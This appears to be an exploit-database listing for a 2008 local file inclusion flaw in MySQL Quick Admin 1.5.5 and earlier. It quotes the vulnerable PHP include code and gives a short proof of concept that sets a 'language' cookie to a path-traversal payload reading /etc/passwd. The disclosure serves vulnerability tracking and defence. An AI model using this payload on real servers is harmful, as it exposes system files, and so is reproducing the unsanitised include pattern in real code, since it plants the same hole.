header-logo
Suggest Exploit
vendor:
MySQL Quick Admin
by:
JosS
7.5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: MySQL Quick Admin
Affected Version From: 1.5.2005
Affected Version To: 1.5.2005
Patch Exists: YES
Related CWE: N/A
CPE: a:mysql_quick_admin:mysql_quick_admin
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

MySQL Quick Admin <= 1.5.5 (COOKIE) Local File Inclusion Vulnerability

MySQL Quick Admin version 1.5.5 and below is vulnerable to a Local File Inclusion vulnerability. This vulnerability is due to the application not properly sanitizing user-supplied input in the 'language' cookie. An attacker can exploit this vulnerability to include arbitrary files from the web server, such as the web server's '/etc/passwd' file, resulting in the disclosure of sensitive information. To exploit this vulnerability, an attacker must set the 'language' cookie to a malicious value, such as '../../../../../../../../../../etc/passwd%00; path=/', and then enter '/index.php' in the browser.

Mitigation:

Ensure that user-supplied input is properly sanitized before being used in the application.
Source

Exploit-DB raw data:

# MySQL Quick Admin <= 1.5.5 (COOKIE) Local File Inclusion Vulnerability
# url: http://www.mysqlquickadmin.com/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Greetz To: Pepelux :)
#
# *Requirements: magic_quotes_gpc = Off

vuln file: /includes/required.php
vuln code: 

if(!empty($_COOKIE['language']) && !isset($_SESSION['language'])){
	$_SESSION['language'] = $_COOKIE['language'];
}

....

if(LANG == ""){
	if(!isset($_SESSION['language'])){
		include("lang/english/lang.php");
		$_LANG = "english";
	} else {
		include("lang/".$_SESSION['language']."/lang.php");
		$_LANG = $_SESSION['language'];
	}

... }

LFI (poc): 
1) javascript:document.cookie="language=../../../../../../../../../../etc/passwd%00; path=/";
2) and enters /index.php

Ingenious work :D

# milw0rm.com [2008-10-01]

Navigation

Suggest Exploit

Services By CQR